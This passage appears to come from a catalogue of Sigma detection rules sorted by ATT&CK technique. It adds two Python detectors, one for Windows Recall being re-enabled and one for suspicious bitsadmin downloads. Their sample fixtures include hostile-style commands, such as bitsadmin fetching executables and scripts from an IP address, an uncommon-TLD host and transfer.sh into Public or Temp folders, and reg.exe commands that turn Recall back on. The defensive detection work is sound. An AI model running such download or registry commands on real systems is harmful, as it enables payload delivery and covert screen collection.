    Description: Detects instances where a VNC service on an OpenCanary node has had a connection attempt.
  • Privilege Escalation via Named Pipe Impersonation - Level: high
    Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
  • Potential Remote Desktop Tunneling - Level: medium
    Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
  • Psexec Execution - Level: medium
    Description: Detects the user accept-agreement flag in the PsExec command line
  • New RDP Connection Initiated From Domain Controller - Level: high
    Description: Detects an RDP connection originating from a domain controller.
attack.t1552 11
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • Azure Keyvault Key Modified or Deleted - Level: medium
    Description: Identifies when a Keyvault Key is modified or deleted in Azure.
  • Azure Key Vault Modified or Deleted - Level: medium
    Description: Identifies when a key vault is modified or deleted.
  • Azure Keyvault Secrets Modified or Deleted - Level: medium
    Description: Identifies when secrets are modified or deleted in Azure.
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Application AppID Uri Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an application's AppID URI.
  • Added Owner To Application - Level: medium
    Description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Potential Okta Password in AlternateID Field - Level: high
    Description: Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities - Level: medium
    Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
  • EventLog Query Requests By Builtin Utilities - Level: medium
    Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
attack.t1007 11
  • Crontab Enumeration - Level: low
    Description: Detects usage of crontab to list the tasks of the user
  • ESXi Network Configuration Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
  • ESXi Storage Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
  • ESXi System Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.
  • ESXi VM List Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
  • ESXi VSAN Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low-level settings
  • Potential Configuration And Service Reconnaissance Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • SC.EXE Query Execution - Level: low
    Description: Detects execution of "sc.exe" to query information about registered services on the system
attack.s0111 11
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Rare Scheduled Task Creations - Level: low
    Description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.t1204 10
  • Ryuk Ransomware Command Line Activity - Level: critical
    Description: Detects Ryuk Ransomware command lines
  • Process Start From Suspicious Folder - Level: low
    Description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files
  • Antivirus Hacktool Detection - Level: high
    Description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Arbitrary Shell Command Execution Via Settingcontent-Ms - Level: medium
    Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
  • Potentially Suspicious WebDAV LNK Execution - Level: medium
    Description: Detects possible execution via LNK file accessed on a WebDAV server.
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • Potential Snatch Ransomware Activity - Level: high
    Description: Detects specific process characteristics of Snatch ransomware word document droppers
  • DarkSide Ransomware Pattern - Level: critical
    Description: Detects DarkSide Ransomware and helpers
attack.t1020 10
  • AWS RDS Master Password Change - Level: medium
    Description: Detects the change of database master password. It may be a part of data exfiltration.
  • Modification or Deletion of an AWS RDS Cluster - Level: high
    Description: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.
  • Restore Public AWS RDS Instance - Level: high
    Description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
  • Github Fork Private Repositories Setting Enabled/Cleared - Level: medium
    Description: Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
  • Github Repository/Organization Transferred - Level: medium
    Description: Detects when a repository or an organization is being transferred to another location.
  • Suspicious Inbox Forwarding - Level: low
    Description: Detects when Microsoft Cloud App Security reports suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
  • PowerShell Script With File Hostname Resolving Capabilities - Level: medium
    Description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
  • PowerShell Script With File Upload Capabilities - Level: low
    Description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.
  • Mail Forwarding/Redirecting Activity In O365 - Level: medium
    Description: Detects email forwarding or redirecting activity in O365 audit logs.
  • AWS EC2 Download Userdata - Level: medium
    Description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.
attack.t1113 10
Show Rules (10)
  • Screen Capture with Import Tool - Level: low
    Description: Detects an adversary creating a screen capture of the desktop with the Import tool. Using this rule on servers is highly recommended, since screenshot utilities are heavily used on user workstations. ImageMagick must be installed.
  • Screen Capture with Xwd - Level: low
    Description: Detects an adversary creating a screen capture of the full screen with xwd. Using this rule on servers is highly recommended, since screenshot utilities are heavily used on user workstations.
  • Screen Capture - macOS - Level: low
    Description: Detects attempts to use screencapture to collect macOS screenshots
  • Windows Screen Capture with CopyFromScreen - Level: medium
    Description: Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
  • Screen Capture Activity Via Psr.EXE - Level: medium
    Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
  • Windows Recall Feature Enabled Via Reg.EXE - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • Periodic Backup For System Registry Hives Enabled - Level: medium
    Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS backs up the system registry hives on restart to the "C:\Windows\System32\config\RegBack" folder and creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was the default behavior on Windows and was disabled as of "Windows 10, version 1803".
  • Windows Recall Feature Enabled - Registry - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • System Drawing DLL Load - Level: low
    Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
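The three "Windows Recall Feature Enabled" rules above describe the same state change seen through different telemetry: the "DisableAIDataAnalysis" policy value is either deleted or set to 0, by direct registry writes or via reg.exe. The following is an added example (not part of the SigmaTACT report or of the Sigma project's own rule logic) that applies those conditions to constructed Sysmon events. It assumes the policy value lives under ...\Software\Policies\Microsoft\Windows\WindowsAI, that Sysmon reports a value deletion as Event ID 12 with EventType "DeleteValue", a value write as Event ID 13 with the data rendered in "Details" (a REG_DWORD as "DWORD (0x00000000)"), and a process start as Event ID 1; the key path and the rendering are assumptions for the example. Writing a non-zero DWORD (keeping Recall disabled) and changes to other values under the same key are deliberately not findings, which is the false-positive source a practitioner most needs to exclude.

```python
"""Added example (not part of the SigmaTACT report or the Sigma project).

Applies the logic of the three "Windows Recall Feature Enabled" rules and the
Reg.EXE variant to constructed Sysmon events.  Assumptions, not taken from the
page: the policy value sits under ...\Software\Policies\Microsoft\Windows\WindowsAI;
Sysmon reports a value deletion as Event ID 12 / EventType "DeleteValue", a
value write as Event ID 13 with the data in "Details" (a REG_DWORD renders as
"DWORD (0x00000000)"), and a process start as Event ID 1.
"""
from __future__ import annotations

import re

RECALL_VALUE = "disableaidataanalysis"
RECALL_KEY_SUFFIX = "\\software\\policies\\microsoft\\windows\\windowsai"  # assumed path
DWORD_RE = re.compile(r"DWORD\s*\(0x([0-9a-f]+)\)", re.I)
REG_DATA_RE = re.compile(r"(?:^|\s)/d\s+(\S+)", re.I)   # reg.exe "/d <data>" switch


def _is_recall_value(target_object: str) -> bool:
    """True when the registry path names the Recall policy value itself."""
    key, _, value = target_object.lower().rpartition("\\")
    return value == RECALL_VALUE and key.endswith(RECALL_KEY_SUFFIX)


def _is_zero(text: str) -> bool:
    """Accepts "0", "0x0" or "00000000" as typed after reg.exe /d."""
    try:
        return int(text.strip('"'), 0) == 0
    except ValueError:
        return False


def detect_recall_enabled(event: dict) -> str | None:
    """Return a finding name when the event (re)enables Recall, else None.

    Writing a non-zero DWORD (keeping Recall disabled) is not a finding, and
    neither is activity on other values under the same key.
    """
    eid = event.get("EventID")
    target = event.get("TargetObject", "")
    if eid == 12 and event.get("EventType") == "DeleteValue" and _is_recall_value(target):
        return "recall_enabled_value_deleted"
    if eid == 13 and _is_recall_value(target):
        m = DWORD_RE.search(event.get("Details", ""))
        if m and int(m.group(1), 16) == 0:
            return "recall_enabled_value_zero"
    if eid == 1:
        image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
        cmd = event.get("CommandLine", "")
        if image == "reg.exe" and RECALL_VALUE in cmd.lower():
            verbs = {t.lower() for t in cmd.split()}
            if "delete" in verbs:
                return "recall_enabled_via_reg_delete"
            m = REG_DATA_RE.search(cmd)
            if "add" in verbs and m and _is_zero(m.group(1)):
                return "recall_enabled_via_reg_add_zero"
    return None


# Constructed sample events (not real telemetry); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsAI\DisableAIDataAnalysis",
     "Details": "DWORD (0x00000000)"},                                  # enables Recall
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsAI\DisableAIDataAnalysis",
     "Details": "DWORD (0x00000001)"},                                  # GPO re-applying the disable
    {"EventID": 12, "EventType": "DeleteValue", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Policies\Microsoft\Windows\WindowsAI\DisableAIDataAnalysis"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKCU\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f'},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKCU\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f'},
    {"EventID": 12, "EventType": "DeleteValue", "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsAI\SomeOtherValue"},
]


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Index and finding name for every event that enables Recall."""
    return [(i, f) for i, ev in enumerate(events) if (f := detect_recall_enabled(ev))]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding, SAMPLE_EVENTS[idx].get("Image"))
```

Events 0, 2 and 3 fire; event 1 (value set to 1) and event 4 (reg add with /d 1) do not, and event 5 touches a different value under the same key. As the rule descriptions note, this logic assumes Recall was explicitly disabled beforehand; on a host where the value never existed, the "deleted" and "reg delete" findings cannot occur and only the "set to 0" paths are reachable.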
attack.t1564 10
Show Rules (10)
  • Mount Execution With Hidepid Parameter - Level: medium
    Description: Detects execution of the "mount" command with the "hidepid" parameter, which hides processes from other users on the system
  • Suspicious Creation with Colorcpl - Level: high
    Description: Once executed, colorcpl.exe copies the supplied (arbitrary) file to c:\windows\system32\spool\drivers\color\
  • Suspicious Executable File Creation - Level: high
    Description: Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
  • Potentially Suspicious Execution From Parent Process In Public Folder - Level: high
    Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
  • Detect Virtualbox Driver Installation OR Starting Of VMs - Level: low
    Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
  • CrashControl CrashDump Disabled - Level: medium
    Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
  • Sysmon Configuration Error - Level: high
    Description: Detects when an adversary is trying to hide its actions from Sysmon logging, based on error messages
  • Sysmon Configuration Modification - Level: high
    Description: Detects when an attacker tries to hide from Sysmon by disabling or stopping it
attack.t1531 9
Show Rules (9)
  • AWS SAML Provider Deletion Activity - Level: medium
    Description: Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
  • AWS ElastiCache Security Group Modified or Deleted - Level: low
    Description: Identifies when an ElastiCache security group has been modified or deleted.
  • Azure Kubernetes Service Account Modified or Deleted - Level: medium
    Description: Identifies when a service account is modified or deleted.
  • Google Cloud Service Account Disabled or Deleted - Level: medium
    Description: Identifies when a service account is disabled or deleted in Google Cloud.
  • Okta User Account Locked Out - Level: medium
    Description: Detects when a user account is locked out.
  • Group Has Been Deleted Via Groupdel - Level: medium
    Description: Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors to cover their tracks
  • User Has Been Deleted Via Userdel - Level: medium
    Description: Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors to cover their tracks
  • User Logoff Event - Level: informational
    Description: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations
  • Remove Account From Domain Admin Group - Level: medium
    Description: Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
attack.t1040 9
Show Rules (9)
  • Network Sniffing - Linux - Level: low
    Description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
  • Network Sniffing - MacOs - Level: informational
    Description: Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
  • Cisco Sniffing - Level: medium
    Description: Detects when a monitor session or a SPAN/RSPAN session is set up or modified
  • Windows Pcap Drivers - Level: medium
    Description: Detects Windows Pcap driver installation based on a list of associated .sys files.
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock - Level: medium
    Description: Detects the execution of PowerShell scripts with calls to the "Start-NetEventSession" cmdlet, which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network traffic to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
  • New Network Trace Capture Started Via Netsh.EXE - Level: medium
    Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
  • Harvesting Of Wifi Credentials Via Netsh.EXE - Level: medium
    Description: Detects the harvesting of Wi-Fi credentials using netsh.exe
  • PktMon.EXE Execution - Level: medium
    Description: Detects execution of PktMon, a tool that captures network packets.
  • Potential Network Sniffing Activity Using Network Tools - Level: medium
    Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
attack.t1049 9
Show Rules (9)
  • System Network Connections Discovery - Linux - Level: low
    Description: Detects usage of system utilities to discover system network connections
  • System Network Connections Discovery - MacOs - Level: informational
    Description: Detects usage of system utilities to discover system network connections
  • Cisco Discovery - Level: low
    Description: Detects commands that gather information about network devices which is not stored in configuration files
  • Use Get-NetTCPConnection - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • Use Get-NetTCPConnection - PowerShell Module - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • System Network Connections Discovery Via Net.EXE - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, including network, user and domain group information. Pikabot has been seen using this technique as part of its C2 botnet registration, with a short collection time frame (less than one minute).
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.s0190 9
Show Rules (9)
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDNs
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using a URL that contains an IP address
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to an uncommon target folder
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
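The bitsadmin rules above all key on the same process command line and differ only in which part they inspect: the URL host (IP literal, uncommon TLD, file-sharing site), the downloaded file's extension, or the local target folder. The following is an added example (not part of the SigmaTACT report or of the Sigma rules' own selectors) that parses a bitsadmin command line once and emits all applicable findings. The indicator lists (uncommon TLDs, file-sharing hosts, suspicious extensions and folders) are assumptions written for this example; the real rules carry their own, longer lists. Every command line is constructed.

```python
"""Added example (not part of the SigmaTACT report or the Sigma project).

Classifies bitsadmin command lines with the checks the S0190 rules above
describe: direct-IP URL, uncommon TLD, file-sharing host, suspicious file
extension and suspicious target folder.  The indicator lists are assumptions
written for this example (the Sigma rules carry their own, longer lists) and
every command line is constructed.
"""
from __future__ import annotations

import ipaddress
import re
import shlex
from pathlib import PureWindowsPath
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
UNCOMMON_TLDS = {"top", "xyz", "icu", "buzz", "cfd"}                # assumed list
FILE_SHARING_HOSTS = {"transfer.sh", "file.io", "anonfiles.com"}    # assumed list
SUSPICIOUS_EXTS = {".exe", ".dll", ".ps1", ".vbs", ".bat", ".hta", ".scr", ".7z"}
SUSPICIOUS_FOLDERS = ("\\users\\public\\", "\\appdata\\local\\temp\\",
                      "\\windows\\temp\\", "\\programdata\\", "%temp%", "%appdata%")


def classify_bitsadmin(cmdline: str) -> list[str]:
    """Return the findings for one process command line (empty when the line
    is not a bitsadmin download at all)."""
    findings: list[str] = []
    low = cmdline.lower()
    # Only /transfer and /addfile carry a remote URL; /list, /info etc. do not.
    if "bitsadmin" not in low or not any(v in low for v in ("/transfer", "/addfile")):
        return findings
    m = URL_RE.search(cmdline)
    if not m:
        return findings
    findings.append("bitsadmin_download")

    host = (urlparse(m.group(0)).hostname or "").lower()
    try:
        ipaddress.ip_address(host)          # IPv4 or bracketed IPv6 literal
        findings.append("direct_ip_url")
    except ValueError:
        if host.rsplit(".", 1)[-1] in UNCOMMON_TLDS:
            findings.append("uncommon_tld")
        if host in FILE_SHARING_HOSTS or any(host.endswith("." + h) for h in FILE_SHARING_HOSTS):
            findings.append("file_sharing_site")

    # The local file name is the token right after the URL; non-POSIX mode
    # keeps Windows backslashes intact and honours double quotes.
    rest = cmdline[m.end():].strip()
    target = shlex.split(rest, posix=False)[0].strip('"') if rest else ""
    if PureWindowsPath(target).suffix.lower() in SUSPICIOUS_EXTS:
        findings.append("suspicious_extension")
    if any(folder in target.lower() for folder in SUSPICIOUS_FOLDERS):
        findings.append("suspicious_target_folder")
    return findings


# Constructed command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r"bitsadmin.exe /transfer job1 /download /priority high http://203.0.113.10:8080/a.exe C:\Users\Public\update.exe",
    r"bitsadmin /transfer WU /priority normal https://download.microsoft.com/pub/kb/update.cab C:\Windows\SoftwareDistribution\Download\update.cab",
    r'cmd.exe /c bitsadmin /transfer t /priority foreground https://cdn.example.top/payload.ps1 "C:\ProgramData\p.ps1"',
    r"bitsadmin /addfile myjob https://transfer.sh/abc/doc.dll %TEMP%\doc.dll",
    r"bitsadmin /list /allusers",
]


def scan_cmdlines(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each command line to its findings, dropping lines with none."""
    return {c: f for c in cmdlines if (f := classify_bitsadmin(c))}


if __name__ == "__main__":
    for cmd, found in scan_cmdlines(SAMPLE_CMDLINES).items():
        print(found, "<-", cmd)
```

The second sample (a Microsoft download into SoftwareDistribution) produces only the low-value "bitsadmin_download" finding, which is what the medium-level "File Download Via Bitsadmin" rule corresponds to; the high-level rules map to the additional findings. Parsing the host with urlparse rather than a regex is what makes the port (":8080") and bracketed IPv6 literals work.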
attack.t1574 9
Show Rules (9)
  • Potential PrintNightmare Exploitation Attempt - Level: high
    Description: Detects DLL deletions from the Spooler Service driver folder, which might be a potential exploitation attempt of CVE-2021-1675
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file in a known desktop application dependency folder, such as Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detects a DLL load from the Spooler Service backup folder
  • DLL Execution Via Register-cimprovider.exe - Level: medium
    Description: Detects the use of register-cimprovider.exe to execute an arbitrary DLL file.
  • Regsvr32 DLL Execution With Uncommon Extension - Level: medium
    Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
  • Potential Registry Persistence Attempt Via DbgManagedDebugger - Level: medium
    Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the configured debugger is invoked when an application crashes
  • Suspicious Printer Driver Empty Manufacturer - Level: high
    Description: Detects a suspicious printer driver installation with an empty Manufacturer value
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Files Dropped to Program Files by Non-Priviledged Process - Level: medium
    Description: Detects files dropped into Windows or Program Files folders by non-privileged processes
attack.t1137 9
Show Rules (9)
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Potential Persistence Via Microsoft Office Startup Folder - Level: high
    Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
  • IE Change Domain Zone - Level: medium
    Description: Hides the file extension through modification of the registry
  • Registry Modification to Hidden File Extension - Level: medium
    Description: Hides the file extension through modification of the registry
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
  • Outlook Security Settings Updated - Registry - Level: medium
    Description: Detects changes to the registry values related to outlook security settings
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to Outlook that indicate a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine whether exploitation succeeded.
attack.t1071 8
Show Rules (8)
  • GALLIUM Artefacts - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • HackTool - SILENTTRINITY Stager DLL Load - Level: high
    Description: Detects SILENTTRINITY stager dll loading activity
  • HackTool - SILENTTRINITY Stager Execution - Level: high
    Description: Detects SILENTTRINITY stager use via PE metadata
  • Potentially Suspicious Rundll32.EXE Execution of UDL File - Level: medium
    Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
  • GALLIUM IOCs - Level: high
